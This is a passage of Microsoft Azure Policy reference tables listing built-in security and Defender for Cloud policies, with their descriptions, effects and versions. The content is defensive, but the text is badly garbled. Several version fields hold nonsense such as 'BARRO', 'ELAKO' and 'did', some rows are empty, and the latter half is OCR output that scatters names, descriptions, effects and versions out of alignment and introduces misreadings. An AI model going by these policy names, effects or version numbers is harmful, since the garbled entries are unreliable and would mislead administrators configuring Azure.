| Resource logs in Azure Data Lake Store should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in Azure Databricks Workspaces should be enabled | Resource logs enable recreating activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | BARRO |
| Resource logs in Azure Kubernetes Service should be enabled | Azure Kubernetes Service's resource logs can help recreate activity trails when investigating security incidents. Enable them to make sure the logs will exist when needed. | AuditIfNotExists, Disabled | 1.0.0 |
| Resource logs in Azure Machine Learning Workspaces should be enabled | Resource logs enable recreating activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 1.0.1 |
| Resource logs in Azure Stream Analytics should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | ELAKO |
| Resource logs in Batch accounts should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in Data Lake Analytics should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in Event Hub should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in IoT Hub should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 3.1.0 |
| Resource logs in Key Vault should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in Logic Apps should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.1.0 |

| Policy name (Azure portal) | Description | Effect(s) | Version (GitHub) |
|---|---|---|---|
| Resource logs in Search services should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Resource logs in Service Bus should be enabled | Audit enabling of resource logs. This enables you to recreate activity trails to use for investigation purposes when a security incident occurs or when your network is compromised. | AuditIfNotExists, Disabled | 5.0.0 |
| Running container images should have vulnerability findings resolved | Container image vulnerability assessment scans container images running on your Kubernetes clusters for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks. | AuditIfNotExists, Disabled | 1.0.2 |
| Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) | Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads. | AuditIfNotExists, Disabled | 1.0.0 |
| Secure transfer to storage accounts should be enabled | Audit requirement of Secure transfer in your storage account. Secure transfer is an option that forces your storage account to accept requests only from secure connections (HTTPS). Use of HTTPS ensures authentication between the server and the service and protects data in transit from network layer attacks such as man-in-the-middle, eavesdropping, and session hijacking. | Audit, Deny, Disabled | 2.0.0 |
| Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign | Service Fabric provides three levels of protection (None, Sign and EncryptAndSign) for node-to-node communication using a primary cluster certificate. Set the protection level to ensure that all node-to-node messages are encrypted and digitally signed. | Audit, Deny, Disabled | 1.1.0 |
| Service Fabric clusters should only use Azure Active Directory for client authentication | Audit usage of client authentication only via Azure Active Directory in Service Fabric. | Audit, Deny, Disabled | 1.1.0 |
| SQL databases should have vulnerability findings resolved | Monitor vulnerability assessment scan results and recommendations for how to remediate database vulnerabilities. | AuditIfNotExists, Disabled | 4.1.0 |
| SQL managed instances should use customer-managed keys to encrypt data at rest | Implementing Transparent Data Encryption (TDE) with your own key provides you with increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties. This recommendation applies to organizations with a related compliance requirement. | Audit, Deny, Disabled | 2.0.0 |
| SQL servers on machines should have vulnerability findings resolved | SQL vulnerability assessment scans your database for security vulnerabilities, and exposes any deviations from best practices such as misconfigurations, excessive permissions, and unprotected sensitive data. Resolving the vulnerabilities found can greatly improve your database security posture. | AuditIfNotExists, Disabled | 1.0.0 |
| SQL servers should use customer-managed keys to encrypt data at rest | Implementing Transparent Data Encryption (TDE) with your own key provides increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties. This recommendation applies to organizations with a related compliance requirement. | Audit, Deny, Disabled | 2.0.1 |
| SQL servers with auditing to storage account destination should be configured with 90 days retention or higher | For incident investigation purposes, we recommend setting the data retention for your SQL Server's auditing to storage account destination to at least 90 days. Confirm that you are meeting the necessary retention rules for the regions in which you are operating. This is sometimes required for compliance with regulatory standards. | AuditIfNotExists, Disabled | 3.0.0 |
| Storage accounts should be migrated to new Azure Resource Manager resources | Use new Azure Resource Manager for your storage accounts to provide security enhancements such as: stronger access control (RBAC), better auditing, Azure Resource Manager based deployment and governance, access to managed identities, access to key vault for secrets, Azure AD-based authentication and support for tags and resource groups for easier security management. | Audit, Deny, Disabled | 1.0.0 |
| Storage accounts should prevent shared key access | Audit requirement of Azure Active Directory (Azure AD) to authorize requests for your storage account. By default, requests can be authorized with either Azure Active Directory credentials, or by using the account access key for Shared Key authorization. Of these two types of authorization, Azure AD provides superior security and ease of use over Shared Key, and is recommended by Microsoft. | Audit, Deny, Disabled | 2.0.0 |
| Storage accounts should restrict network access | Network access to storage accounts should be restricted. Configure network rules so only applications from allowed networks can access the storage account. To allow connections from specific internet or on-premises clients, access can be granted to traffic from specific Azure virtual networks or to public internet IP address ranges. | Audit, Deny, Disabled | LTA |
| Storage accounts should restrict network access using virtual network rules | Protect your storage accounts from potential threats using virtual network rules as a preferred method instead of IP-based filtering. Disabling IP-based filtering prevents public IPs from accessing your storage accounts. | Audit, Deny, Disabled | 1.0.1 |
| Storage accounts should use customer-managed key for encryption | Secure your blob and file storage account with greater flexibility using customer-managed keys. When you specify a customer-managed key, that key is used to protect and control access to the key that encrypts your data. Using customer-managed keys provides additional capabilities to control rotation of the key encryption key or cryptographically erase data. | Audit, Disabled | 1.0.3 |
| Storage accounts should use private link | Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The Private Link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your storage account, data leakage risks are reduced. Learn more about private links at https://aka.ms/azureprivatelinkoverview. | AuditIfNotExists, Disabled | 2.0.0 |
| Subnets should be associated with a Network Security Group | Protect your subnet from potential threats by restricting access to it with a Network Security Group (NSG). NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your subnet. | AuditIfNotExists, Disabled | 3.0.0 |
| Subscriptions should have a contact email address for security issues | To ensure the relevant people in your organization are notified when there is a potential security breach in one of your subscriptions, set a security contact to receive email notifications from Security Center. | AuditIfNotExists, Disabled | 1.0.1 |
| Synapse Workspaces should use only Azure Active Directory identities for authentication | Azure Active Directory (AAD)-only authentication methods improve security by ensuring that Synapse Workspaces exclusively require AAD identities for authentication. Learn more at: https://aka.ms/Synapse. | Audit, Deny, Disabled | 1.0.0 |
| System updates on virtual machine scale sets should be installed | Audit whether there are any missing system security updates and critical updates that should be installed to ensure that your Windows and Linux virtual machine scale sets are secure. | AuditIfNotExists, Disabled | 3.0.0 |
| System updates should be installed on your machines | Missing security system updates on your servers will be monitored by Azure Security Center as recommendations. | AuditIfNotExists, Disabled | 4.0.0 |
| There should be more than one owner assigned to your subscription | It is recommended to designate more than one subscription owner in order to have administrator access redundancy. | AuditIfNotExists, Disabled | 3.0.0 |
| Transparent Data Encryption on SQL databases should be enabled | Transparent data encryption should be enabled to protect data-at-rest and meet compliance requirements. | AuditIfNotExists, Disabled | 2.0.0 |
| Virtual machines and virtual machine scale sets should have encryption at host enabled | Use encryption at host to get end-to-end encryption for your virtual machine and virtual machine scale set data. Encryption at host enables encryption at rest for your temporary disk and OS/data disk caches. Temporary and ephemeral OS disks are encrypted with platform-managed keys when encryption at host is enabled. OS/data disk caches are encrypted at rest with either customer-managed or platform-managed key, depending on the encryption type selected on the disk. Learn more at https://aka.ms/vm-hbe. | Audit, Deny, Disabled | 1.0.0 |
| Virtual machines should be migrated to new Azure Resource Manager resources | Use new Azure Resource Manager for your virtual machines to provide security enhancements such as: stronger access control (RBAC), better auditing, Azure Resource Manager based deployment and governance, access to managed identities, access to key vault for secrets, Azure AD-based authentication and support for tags and resource groups for easier security management. | Audit, Deny, Disabled | 1.0.0 |
| Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources | By default, a virtual machine's OS and data disks are encrypted at rest using platform-managed keys. Temp disks, data caches and data flowing between compute and storage aren't encrypted. Disregard this recommendation if: 1. using encryption-at-host, or 2. server-side encryption on Managed Disks meets your security requirements. Learn more in: Server-side encryption of Azure Disk Storage: https://aka.ms/disksse, Different disk encryption offerings: https://aka.ms/diskencryptioncomparison | AuditIfNotExists, Disabled | did |
| Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity | The Guest Configuration extension requires a system-assigned managed identity. Azure virtual machines in the scope of this policy will be non-compliant when they have the Guest Configuration extension installed but do not have a system-assigned managed identity. Learn more at https://aka.ms/gcpol | AuditIfNotExists, Disabled | 1.0.1 |
| VM Image Builder templates should use private link | Azure Private Link lets you connect your virtual network to Azure services without a public IP address at the source or destination. The Private Link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to your VM Image Builder building resources, data leakage risks are reduced. Learn more about private links at: https://docs.microsoft.com/azure/virtual-machines/linux/image-builder-networking#deploy-using-an-existing-vnet. | Audit, Disabled, Deny | 1.1.0 |
| VPN gateways should use only Azure Active Directory (Azure AD) authentication for point-to-site users | Disabling local authentication methods improves security by ensuring that VPN Gateways use only Azure Active Directory identities for authentication. Learn more about Azure AD authentication at https://docs.microsoft.com/azure/vpn-gateway/openvpn-azure-ad-tenant | Audit, Deny, Disabled | 1.0.0 |
| Vulnerabilities in container security configurations should be remediated | Audit vulnerabilities in security configuration on machines with Docker installed and display them as recommendations in Azure Security Center. | AuditIfNotExists, Disabled | 3.0.0 |
| Vulnerabilities in security configuration on your machines should be remediated | Servers which do not satisfy the configured baseline will be monitored by Azure Security Center as recommendations. | AuditIfNotExists, Disabled | 3.1.0 |
| Vulnerabilities in security configuration on your virtual machine scale sets should be remediated | Audit the OS vulnerabilities on your virtual machine scale sets to protect them from attacks. | AuditIfNotExists, Disabled | 3.0.0 |
| Vulnerability assessment should be enabled on SQL Managed Instance | Audit each SQL Managed Instance which doesn't have recurring vulnerability assessment scans enabled. Vulnerability assessment can discover, track, and help you remediate potential database vulnerabilities. | AuditIfNotExists, Disabled | 1.0.1 |
| Vulnerability assessment should be enabled on your SQL servers | Audit Azure SQL servers which do not have vulnerability assessment properly configured. Vulnerability assessment can discover, track, and help you remediate potential database vulnerabilities. | AuditIfNotExists, Disabled | 3.0.0 |
| Web Application Firewall (WAF) should be enabled for Application Gateway | Deploy Azure Web Application Firewall (WAF) in front of public facing web applications for additional inspection of incoming traffic. Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities such as SQL injections, Cross-Site Scripting, local and remote file executions. You can also restrict access to your web applications by countries, IP address ranges, and other http(s) parameters via custom rules. | Audit, Deny, Disabled | 2.0.0 |
| Windows Defender Exploit Guard should be enabled on your machines | Windows Defender Exploit Guard uses the Azure Policy Guest Configuration agent. Exploit Guard has four components that are designed to lock down devices against a wide variety of attack vectors and block behaviors commonly used in malware attacks while enabling enterprises to balance their security risk and productivity requirements (Windows only). | AuditIfNotExists, Disabled | 2.0.0 |
| Windows machines should be configured to use secure communication protocols | To protect the privacy of information communicated over the Internet, your machines should use the latest version of the industry-standard cryptographic protocol, Transport Layer Security (TLS). TLS secures communications over a network by encrypting a connection between machines. | AuditIfNotExists, Disabled | 4.1.1 |
| Windows machines should have Log Analytics agent installed on Azure Arc | Machines are non-compliant if the Log Analytics agent is not installed on Azure Arc-enabled Windows servers. | AuditIfNotExists, Disabled | 2.0.0 |
| Windows machines should meet requirements of the Azure compute security baseline | Requires that prerequisites are deployed to the policy assignment scope. For details, visit https://aka.ms/gcpol. Machines are non-compliant if the machine is not configured correctly for one of the recommendations in the Azure compute security baseline. | AuditIfNotExists, Disabled | 2.0.0 |

Microsoft Defender for Cloud category

| Name (Azure portal) | Description | Effect(s) | Version (GitHub) |
|---|---|---|---|
| [Preview]: API endpoints in Azure API Management should be authenticated | API endpoints published within Azure API Management should enforce authentication to help minimize security risk. Authentication mechanisms are sometimes implemented incorrectly or are missing. This allows attackers to exploit implementation flaws and to access data. Learn more about the OWASP API Threat for Broken User Authentication here: https://learn.microsoft.com/azure/api-management/mitigate-owasp-api-threats#broken-user-authentication | AuditIfNotExists, Disabled | 1.0.0-preview |
| [Preview]: API endpoints that are unused should be disabled and removed from the Azure API Management service | As a security best practice, API endpoints that haven't received traffic for 30 days are considered unused and should be removed from the Azure API Management service. Keeping unused API endpoints may pose a security risk to your organization. These may be APIs that should have been deprecated from the Azure API Management service but may have been accidentally left active. Such APIs typically do not receive the most up-to-date security coverage. | AuditIfNotExists, Disabled | 1.0.0-preview |
| [Preview]: Azure Security agent should be installed on your Linux Arc machines | Install the Azure Security agent on your Linux Arc machines in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 1.0.0-preview |
| [Preview]: Azure Security agent should be installed on your Linux virtual machine scale sets | Install the Azure Security agent on your Linux virtual machine scale sets in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 2.0.0-preview |
| [Preview]: Azure Security agent should be installed on your Linux virtual machines | Install the Azure Security agent on your Linux virtual machines in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 2.0.0-preview |
| [Preview]: Azure Security agent should be installed on your Windows Arc machines | Install the Azure Security agent on your Windows Arc machines in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 1.0.0-preview |
| [Preview]: Azure Security agent should be installed on your Windows virtual machine scale sets | Install the Azure Security agent on your Windows virtual machine scale sets in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 2.1.0-preview |
| [Preview]: Azure Security agent should be installed on your Windows virtual machines | Install the Azure Security agent on your Windows virtual machines in order to monitor your machines for security configurations and vulnerabilities. Results of the assessments can be seen and managed in Azure Security Center. | AuditIfNotExists, Disabled | 2.1.0-preview |
| [Preview]: ChangeTracking extension should be installed on your Linux Arc machine | Install ChangeTracking Extension on Linux Arc machines to enable File Integrity Monitoring (FIM) in Azure Security Center. FIM examines operating system files, Windows registries, application software, Linux system files, and more, for changes that might indicate an attack. The extension can be installed in virtual machines and locations supported by Azure Monitoring Agent. | AuditIfNotExists, Disabled | 1.0.0-preview |
| [Preview]: ChangeTracking extension should be installed on your Linux virtual machine | Install ChangeTracking Extension on Linux virtual machines to enable File Integrity Monitoring (FIM) in Azure Security Center. FIM examines operating system files, Windows registries, application software, Linux system files, and more, for changes that might indicate an attack. The extension can be installed in virtual machines and locations supported by Azure Monitoring Agent. | AuditIfNotExists, Disabled | 2.0.0-preview |
| [Preview]: ChangeTracking extension should be installed on your Linux virtual machine scale sets | Install ChangeTracking Extension on Linux virtual machine scale sets to enable File Integrity Monitoring (FIM) in Azure Security Center. FIM examines operating system files, Windows registries, application software, Linux system files, and more, for changes that might indicate an attack. The extension can be installed in virtual machines and locations supported by Azure Monitoring Agent. | | |
| [Preview]: ChangeTracking extension should be installed on your Windows Arc machine | Install ChangeTracking Extension on Windows Arc machines to enable File Integrity Monitoring (FIM) in Azure Security Center. FIM examines operating system files, Windows registries, application software, Linux system files, and more, for changes that might indicate an attack. The extension can be installed in virtual machines and locations supported by Azure Monitoring Agent. | | |
| [Preview]: ChangeTracking extension should be installed on your Windows virtual machine | Install ChangeTracking Extension on Windows virtual | | |
| [Preview]: ChangeTracking extension should be installed on your Windows virtual machine scale sets | | | |
| [Preview]: Configure Arc machines to create the default Microsoft Defender for Cloud pipeline using Azure Monitor Agent | | | |
| [Preview]: Configure Arc machines to create the Microsoft Defender for Cloud user-defined pipeline using Azure Monitor Agent | | | |
| [Preview]: Configure Arc-enabled SQL Servers to automatically | | | |
machines to enable File Integrity Monitoring(FIM) in Azure 
Security Center. FIM examines operating system files, 
Windows registries, application software, Linux system files, 
and more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Windows virtual 
machine scale sets to enable File Integrity Monitoring(FIM) 
in Azure Security Center. FIM examines operating system 
files, Windows registries, application software, Linux system 
files, and more, for changes that might indicate an attack. 
The extension can be installed in virtual machines and 
locations supported by Azure Monitoring Agent. 


Configure Arc machines to create the default Microsoft 
Defender for Cloud pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine to store audit records. 
Target virtual machines must be in a supported location. 


Configure Arc machines to create the Microsoft Defender 
for Cloud user-defined pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Use the user-provided 
Log Analytics workspace to store audit records. Create a 
resource group and a Data Collection Rule in the same 
region as the user-provided Log Analytics workspace. 
Target Arc machines must be in a supported location. 


Automate the deployment of Azure Monitor Agent 
extension on your Windows Arc-enabled SQL Servers. Learn 
more: https://aka.ms/AMAOverview E. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.0.0- 
preview 2 


2.0.0- 
preview E 


2.0.0- 
preview E 


1.2.0- 
preview E 


1.2.0- 
preview E 


HA de 
preview E 


Name 


(Azure portal) 


install Azure Monitor 
Agent č 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL“ 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL and 
DCR with a Log 
Analytics workspace E 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 
install Microsoft 
Defender for SQL and 
DCR with a user- 
defined LA workspace # 


[Preview]: Configure 
Arc-enabled SQL 
Servers with Data 
Collection Rule 
Association to 
Microsoft Defender for 
SQL DCR & 


[Preview]: Configure 
Arc-enabled SQL 
Servers with Data 
Collection Rule 
Association to 
Microsoft Defender for 
SQL user-defined DCR Z 


[Preview]: Configure 
Association to link Arc 
machines to default 
Microsoft Defender for 
Cloud Data Collection 
Rule Z 


[Preview]: Configure 
Association to link Arc 
machines to user- 
defined Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Association to link 
virtual machines to 


Description 


Configure Windows Arc-enabled SQL Servers to 
automatically install the Microsoft Defender for SQL agent. 
Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and a Data Collection Rule in the same region as the 
user-defined Log Analytics workspace. 


Configure association between Arc-enabled SQL Servers 
and the Microsoft Defender for SQL DCR. Deleting this 
association will break the detection of security 
vulnerabilities for this Arc-enabled SQL Servers. 


Configure association between Arc-enabled SQL Servers 
and the Microsoft Defender for SQL user-defined DCR. 
Deleting this association will break the detection of security 
vulnerabilities for this Arc-enabled SQL Servers. 


Configure Arc machines to automatically create an 
association with the default data collection rule for 
Microsoft Defender for Cloud. Deleting this association will 
break the detection of security vulnerabilities for this Arc 
machine. Target Arc machines must be in a supported 
location. 


Configure Arc machines to automatically create an 
association with the user-defined data collection rule for 
Microsoft Defender for Cloud. Deleting this association will 
break the detection of security vulnerabilities for this Arc 
machine. Target Arc machines must be in a supported 
location. 


Configure machines to automatically create an association 
with the default data collection rule for Microsoft Defender 
for Cloud. Deleting this association will break the detection 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.1- 
preview E 


Wade 
preview E 


1.2.0- 
preview E 


1.0.1- 
preview E 


1,1,0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


3.0.0- 
preview 2 


Name 


(Azure portal) 


default Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Association to link 
virtual machines to 
user-defined Microsoft 
Defender for Cloud 
Data Collection Rule Z 


[Preview]: Configure 
Azure Defender for SQL 
agent on virtual 
machine @ 


[Preview]: Configure 
ChangeTracking 
Extension for Linux Arc 
machines E 


[Preview]: Configure 
ChangeTracking 
Extension for Linux 
virtual machine scale 
sets 2 


[Preview]: Configure 
ChangeTracking 
Extension for Linux 
virtual machines E 


[Preview]: Configure 
ChangeTracking 
Extension for Windows 
Arc machines E 


[Preview]: Configure 
ChangeTracking 


Description 


of security vulnerabilities for this virtual machine. Target 
virtual machines must be in a supported location. 


Configure machines to automatically create an association 
with the user-defined data collection rule for Microsoft 
Defender for Cloud. Deleting this association will break the 
detection of security vulnerabilities for this virtual machine. 
Target virtual machines must be in a supported location. 


Configure Windows machines to automatically install the 
Azure Defender for SQL agent where the Azure Monitor 
Agent is installed. Security Center collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Creates a resource 
group and Log Analytics workspace in the same region as 
the machine. Target virtual machines must be in a 
supported location. 


Configure Linux Arc machines to automatically install the 
ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Linux virtual machine scale sets to automatically 
install the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Linux virtual machines to automatically install the 
ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Windows Arc machines to automatically install 
the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure Windows virtual machine scale sets to 
automatically install the ChangeTracking Extension to 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.0.0- 
preview 2 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


Námesion for Windows 
MOS Gerta scale 


setst 


[Preview]: Configure 
ChangeTracking 
Extension for Windows 
virtual machines E 


[Preview]: Configure 
machines to create the 
Microsoft Defender for 
Cloud user-defined 
pipeline using Azure 
Monitor Agent £ 


[Preview]: Configure 
Microsoft Defender for 
APIs should be enabled Z 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Azure Monitor Agent 2 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL’ 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL and DCR with a 
Log Analytics 
workspace 7 


[Preview]: Configure 
SQL Virtual Machines 
to automatically install 
Microsoft Defender for 
SQL and DCR with a 
user-defined LA 
workspace “ 


[Preview]: Configure 
supported Linux Arc 
machines to 


Desei¢pilemtegrity Monitoring(FIM) in Azure Security 
Center. FIM examines operating system files, Windows 
registries, application software, Linux system files, and 
more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitor Agent. 


Configure Windows virtual machines to automatically 
install the ChangeTracking Extension to enable File Integrity 
Monitoring(FIM) in Azure Security Center. FIM examines 
operating system files, Windows registries, application 
software, Linux system files, and more, for changes that 
might indicate an attack. The extension can be installed in 
virtual machines and locations supported by Azure Monitor 
Agent. 


Configure machines to create the Microsoft Defender for 
Cloud user-defined pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Use the user-provided 
Log Analytics workspace to store audit records. Creates a 
resource group and a Data Collection Rule in the same 
region as the user-provided Log Analytics workspace. 
Target virtual machines must be in a supported location. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Automate the deployment of Azure Monitor Agent 
extension on your Windows SQL Virtual Machines. Learn 
more: https://aka.ms/AMAOverview E. 


Configure Windows SQL Virtual Machines to automatically 
install the Microsoft Defender for SQL extension. Microsoft 
Defender for SQL collects events from the agent and uses 
them to provide security alerts and tailored hardening tasks 
(recommendations). 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine. 


Microsoft Defender for SQL collects events from the agent 
and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group and a Data Collection Rule in the same region as the 
user-defined Log Analytics workspace. 


Configure supported Linux Arc machines to automatically 
install the Azure Security agent. Security Center collects 
events from the agent and uses them to provide security 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.2.0- 
preview E 


10.2- 
preview E 


bb 
preview E 


1.1.0- 
preview E 


1.2.0- 
preview E 


1.2.0- 
preview E 


1.0.0- 
preview E 


Name 


(Azure portal) 


automatically install the 
Azure Security agent ¢ 


[Preview]: Configure 
supported Linux virtual 
machine scale sets to 
automatically install the 
Azure Security agent ¢ 


[Preview]: Configure 
supported Linux virtual 
machine scale sets to 
automatically install the 
Guest Attestation 
extension E 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically enable 
Secure Boot Z 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Linux virtual 
machines to 
automatically install the 
Guest Attestation 
extension č 


[Preview]: Configure 
supported virtual 
machines to 
automatically enable 
vTPM @ 


[Preview]: Configure 
supported Windows 
Arc machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Windows 
machines to 
automatically install the 
Azure Security agent 7 


[Preview]: Configure 
supported Windows 


Description 


alerts and tailored hardening tasks (recommendations). 
Target Linux Arc machines must be in a supported location. 


Configure supported Linux virtual machine scale sets to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target virtual machines must be in a 
supported location. 


Configure supported Linux virtual machines scale sets to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported Linux virtual machines to 
automatically enable Secure Boot to mitigate against 
malicious and unauthorized changes to the boot chain. 
Once enabled, only trusted bootloaders, kernel and kernel 
drivers will be allowed to run. 


Configure supported Linux virtual machines to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target virtual machines must be in a 
supported location. 


Configure supported Linux virtual machines to 
automatically install the Guest Attestation extension to 
allow Azure Security Center to proactively attest and 
monitor the boot integrity. Boot integrity is attested via 
Remote Attestation. 


Configure supported virtual machines to automatically 
enable vTPM to facilitate Measured Boot and other OS 
security features that require a TPM. Once enabled, vIPM 
can be used to attest boot integrity. 


Configure supported Windows Arc machines to 
automatically install the Azure Security agent. Security 
Center collects events from the agent and uses them to 
provide security alerts and tailored hardening tasks 
(recommendations). Target Windows Arc machines must be 
in a supported location. 


Configure supported Windows machines to automatically 
install the Azure Security agent. Security Center collects 
events from the agent and uses them to provide security 
alerts and tailored hardening tasks (recommendations). 
Target virtual machines must be in a supported location. 


Configure supported Windows virtual machine scale sets to 
automatically install the Azure Security agent. Security 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
